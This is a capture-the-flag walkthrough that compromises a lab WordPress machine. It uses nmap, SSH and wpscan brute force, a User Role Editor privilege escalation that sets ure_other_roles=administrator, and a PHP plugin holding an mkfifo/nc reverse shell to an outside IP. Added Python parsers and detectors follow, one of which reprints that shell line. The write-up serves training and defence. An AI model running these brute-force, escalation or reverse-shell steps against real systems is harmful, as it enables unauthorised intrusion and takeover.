Are you ready to infiltrate the machine in front of us? In this new episode of the long-running series, we will break into a new machine using a methodical approach.
We will compromise the machine using tools, and escalate privileges after gathering information.
Let’s start developing your skills, punks!
Define the machine name and the target IP as variables on the shell.
Let’s send a standard ping and look at the ICMP reply: ping -c 1 $target_ip
It is up.
Using Nmap, let’s get to know the enemy we are facing and discover the open doors. This is one of the most important steps: nmap -sV -sC -A --script=vuln -oN nmap_result.txt -Pn $target_ip
Save this nmap command, you can use it in many scenarios.
-sV: Service version detection. Nmap will attempt to determine the version of the services running on open ports.
-sC: Default script scanning. Nmap will use a set of standard scripts from the Nmap Scripting Engine (NSE) to gather additional information about the target.
-A: Comprehensive scan. Enables OS detection, version detection, script scanning, and traceroute. This provides detailed information about the target.
--script=vuln: Runs NSE scripts that check for vulnerabilities. This specifically targets scripts designed to identify potential vulnerabilities in the target services.
-oN nmap_result.txt: Output to a file. Saves the scan results to a file named nmap_result.txt in a human-readable format.
-Pn: No ping. Nmap will treat the target as up and will not send initial ping requests to determine if the host is up, which is useful if ICMP is blocked by a firewall.
$target_ip: The target IP address or hostname to be scanned.
The scan takes some time, but you need to keep your patience.
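As an added example (not part of the original write-up), the following Python parses nmap’s normal (-oN) output, the format of the nmap_result.txt produced above, and pulls out the open ports, the WordPress version reported by http-generator and the usernames listed by the http-wordpress-users script. The sample output, including its version strings and the 10.10.10.10 address, is constructed for the example and not copied from the target.

```python
import re

# Constructed sample in nmap's normal (-oN) output format. Versions and the
# address are placeholders for the example, not results from the real target.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated (constructed sample)
Nmap scan report for 10.10.10.10
Host is up (0.040s latency).
Not shown: 998 closed ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.x (constructed)
80/tcp  open   http    Apache httpd 2.4 (constructed)
|_http-generator: WordPress 5.3.2
| http-wordpress-users:
| Username found: jack
| Username found: wendy
|_Username found: danny
443/tcp closed https
"""

# One row of the port table: "<port>/<proto> <state> <service> [version...]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)
USERNAME_LINE = re.compile(r"^\|_?\s*Username found:\s*(\S+)")
GENERATOR_LINE = re.compile(r"http-generator:\s*WordPress\s+([\d.]+)")


def parse_open_ports(text):
    """Return the open ports from -oN text as a list of dicts (port, proto, service, version)."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            ports.append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "service": m.group("service"),
                "version": (m.group("version") or "").strip(),
            })
    return ports


def enumerated_usernames(text):
    """Return usernames reported by the http-wordpress-users NSE script, in order."""
    return [m.group(1) for m in map(USERNAME_LINE.match, text.splitlines()) if m]


def wordpress_version(text):
    """Return the WordPress version from the http-generator line, or None."""
    m = GENERATOR_LINE.search(text)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Usage: python3 parse_nmap.py nmap_result.txt (falls back to the sample).
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    for p in parse_open_ports(text):
        print(f"{p['port']}/{p['proto']} {p['service']} {p['version']}")
    print("WordPress:", wordpress_version(text))
    print("Users:", ", ".join(enumerated_usernames(text)))
```

The port regex keys on the state column, so closed and filtered rows are dropped and the version string, which may contain spaces, is captured whole.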
We have a treasure trove of valuable information.
We discovered that ports 22 (SSH) and 80 (HTTP) were open, and we also realized that the site in front of us was running WordPress. In addition, the scan enumerated usernames, which gave us the opportunity to note the accounts we could potentially attack.
Usernames:
jack
wendy
danny
HTTP pages:
/wp-login.php
/robots.txt
/readme.html
/0
Let’s see if SSH allows logging in with a blank password for these usernames.
Nope… Still worth a try. We can still perform brute force on usernames.
We can speed up the process by manually recording these usernames in a wordlist.
Run msfconsole: msfconsole -q
Search for the scanner modules available for SSH login.
Then select it with use.
After checking the required options in the Options section, set the parameters and the wordlist files.
Just run it.
This brute force takes a long time. While this process continues, we can move on to the next stage.
We were unable to discover a password for SSH.
Let’s set the wordlists we may use as variables on the shell. You can find wordlists under /usr/share/wordlists.
Variables like these prevent confusion and keep you from getting lost when typing complex commands.
We also need to add the target IP to our hosts file so the hostname resolves.
Just ping it again.
So far we are running without errors.
It’s time to start a general investigation using the wpscan tool: wpscan -e u,vp --url ourtargetsite.thm --rua --force
There is so much valuable information, isn’t there?
You can research exploits based on each version and component reported here.
Let’s perform password brute force via WordPress with the following command:
wpscan --url http://ourtargetsite.thm -U usernames_target.txt -P /usr/share/wordlists/fasttrack.txt
We discovered a password for user Wendy: wendy:changelater
Let’s quickly try the SSH connection.
It didn’t work, which means this user uses a different password on each platform. In some scenarios, though, users tend to reuse the same password everywhere.
Now change ourtargetsite.thm to jack.thm in /etc/hosts file.
We have to go to the WordPress login page and try the password there.
We have obtained the user, but it seems that this user does not have admin privileges.
Now we can conduct vulnerability research: searchsploit Wordpress 5.3.2
Go to “Profile”. The “User Role Editor” plugin is used here. The exploit entry gives you the roadmap: https://www.exploit-db.com/exploits/44595
Running Burp Suite will save us time. Point the browser at its proxy.
Click “Update Profile” and pay attention to the BODY part in the POST method.
The vulnerability entry advises adding the value &ure_other_roles=administrator to the end of the BODY.
Then forward.
We got that now!
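As an added defensive example (not part of the original write-up), the following Python flags profile-update requests that carry the ure_other_roles parameter when they come from users whose role does not allow assigning roles, which is the tampering just described. The request records, the roles attached to them, the user IDs and the /wp-admin paths are constructed for the example; in a real deployment the records would come from a WAF or audit log that retains POST bodies.

```python
from urllib.parse import parse_qs

# Constructed request records for the example (not taken from the target).
# Each record is what an audit or WAF log that keeps POST bodies could give
# us: the authenticated user, that user's WordPress role, and the request.
SAMPLE_REQUESTS = [
    {"user": "wendy", "role": "contributor", "method": "POST",
     "path": "/wp-admin/profile.php",
     "body": "action=update&user_id=2&display_name=wendy&ure_other_roles=administrator"},
    {"user": "wendy", "role": "contributor", "method": "POST",
     "path": "/wp-admin/profile.php",
     "body": "action=update&user_id=2&display_name=wendy"},
    {"user": "jack", "role": "administrator", "method": "POST",
     "path": "/wp-admin/user-edit.php",
     "body": "action=update&user_id=3&ure_other_roles=editor"},
    {"user": "danny", "role": "author", "method": "GET",
     "path": "/wp-admin/profile.php", "body": ""},
]

# Roles that may legitimately assign roles to users in WordPress.
ROLE_ASSIGNING_ROLES = {"administrator"}
# Roles whose unexpected assignment should be treated as critical.
HIGH_VALUE_ROLES = {"administrator", "editor"}


def requested_roles(body):
    """Return the roles named in the ure_other_roles field of a form body, sorted."""
    params = parse_qs(body, keep_blank_values=True)
    roles = set()
    for value in params.get("ure_other_roles", []):
        # Allow for a comma-separated list of roles in a single field.
        roles.update(r.strip() for r in value.split(",") if r.strip())
    return sorted(roles)


def role_tampering_findings(requests):
    """Flag POSTs that carry ure_other_roles from users who cannot assign roles."""
    findings = []
    for req in requests:
        if req["method"] != "POST":
            continue
        roles = requested_roles(req["body"])
        if not roles:
            continue
        if req["role"] in ROLE_ASSIGNING_ROLES:
            continue  # an administrator editing a user is expected behaviour
        severity = "high" if HIGH_VALUE_ROLES & set(roles) else "medium"
        findings.append({
            "user": req["user"],
            "current_role": req["role"],
            "path": req["path"],
            "requested_roles": roles,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in role_tampering_findings(SAMPLE_REQUESTS):
        print(finding)
```

The check deliberately keys on who submitted the field rather than on the path alone, because the same field is legitimate when an administrator edits another user; the same idea can be enforced server-side by rejecting the parameter unless the current user can promote users.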
The next thing to do is to add a reverse shell. There are many options for this, let’s talk about some of them.
Run msfconsole again: msfconsole -q
We should use the wp_admin_shell_upload module.
Check the Options values and edit whatever is necessary.
Then just run.
As the second option, put your machine in listening mode.
Go to “Plugins - Plugin Editor” and paste the code below:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.103.187 21000 >/tmp/f'); ?>
Activate your custom plugin via “Installed Plugins”.
Wow! Now you have a reverse shell. Stabilize the shell with python -c 'import pty; pty.spawn("/bin/bash")'
$ rlwrap nc -nlvp 21000
listening on [any] 21000 ...
connect to [10.4.34.126] from (UNKNOWN) [10.10.16.248] 47424
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
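As an added defensive example (not part of the original write-up), the following Python scans WordPress plugin sources for PHP command-execution functions and for the reverse-shell plumbing seen in the pasted plugin above (mkfifo, an interactive /bin/sh, nc), which is how a file dropped in through the Plugin Editor stands out from ordinary plugin code. The plugin files, their paths and the 192.0.2.10 address are constructed for the example.

```python
import os
import re

# Constructed plugin sources for the example (not taken from the target).
SAMPLE_PLUGINS = {
    "wp-content/plugins/hello-dolly/hello.php":
        "<?php\n/* Plugin Name: Hello Dolly */\nfunction hello_dolly() { echo 'Hello'; }\n",
    "wp-content/plugins/custom/shell.php":
        "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
        "|nc 192.0.2.10 21000 >/tmp/f'); ?>\n",
    "wp-content/plugins/backup/run.php":
        "<?php $out = shell_exec('tar czf backup.tgz wp-content'); echo $out;\n",
}

# PHP functions that hand a string to the operating system.
EXEC_FUNCS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*\(", re.I)
# Fragments typical of an interactive shell being wired to the network.
SHELL_INDICATORS = re.compile(
    r"(mkfifo|/bin/sh\s+-i|/bin/bash\s+-i|\bnc\b|\bncat\b|/dev/tcp/)")


def scan_plugin_sources(files):
    """Return one finding per PHP source that calls an exec-style function."""
    findings = []
    for path, src in sorted(files.items()):
        funcs = sorted({m.group(1).lower() for m in EXEC_FUNCS.finditer(src)})
        if not funcs:
            continue
        indicators = sorted({m.group(1) for m in SHELL_INDICATORS.finditer(src)})
        findings.append({
            "path": path,
            "functions": funcs,
            "indicators": indicators,
            # An exec function alone deserves review; with shell plumbing it is a shell.
            "severity": "high" if indicators else "medium",
        })
    return findings


def scan_plugin_dir(root):
    """Walk a real plugins directory and scan every .php file under it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return scan_plugin_sources(files)


if __name__ == "__main__":
    # Usage: python3 scan_plugins.py /var/www/html/wp-content/plugins
    import sys
    results = scan_plugin_dir(sys.argv[1]) if len(sys.argv) > 1 else scan_plugin_sources(SAMPLE_PLUGINS)
    for f in results:
        print(f["severity"].upper(), f["path"], f["functions"], f["indicators"])
```

Legitimate plugins do call shell_exec for things like backups, so the scanner reports them at medium severity for review and reserves high severity for sources that combine an exec call with shell or network plumbing; pairing this with file-integrity monitoring of wp-content/plugins, or disabling the editor with DISALLOW_FILE_EDIT, catches the same path at write time.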
Don’t give up on hacking.
Code for good.
^-^